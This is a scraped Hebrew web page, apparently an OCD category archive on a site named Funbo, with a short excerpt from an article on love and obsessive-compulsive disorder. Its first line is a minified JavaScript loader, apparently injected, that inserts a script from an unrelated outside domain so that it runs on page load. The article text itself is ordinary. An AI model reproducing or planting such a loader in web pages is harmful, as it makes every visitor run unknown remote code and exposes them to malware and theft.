;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ארכיון OCD - Funbo
אהבה ו-OCD – היבטים פסיכולוגיים ומוחיים

אהבה ו-OCD – היבטים פסיכולוגיים ומוחיים

OCD מאת דפנה שם טוב בכדי להבין מה מלמד אותנו הדמיון בין אהבה ו-OCD נסקור בקצרה את מאפייניה העיקריים של הפרעה אובססיבית-קומפולסיבית: OCD היא אחת מן ההפרעות שמטפלים רבים מתקשים להיות אמפתיים כלפיה. תחושות שכיחות הן תסכול, תשישות או לעג סמוי מצידו של המטפל כמו גם מהסביבה. העדר האמפתיה לרוב נובע מהקושי להבין למה הסובלים … להמשיך לקרוא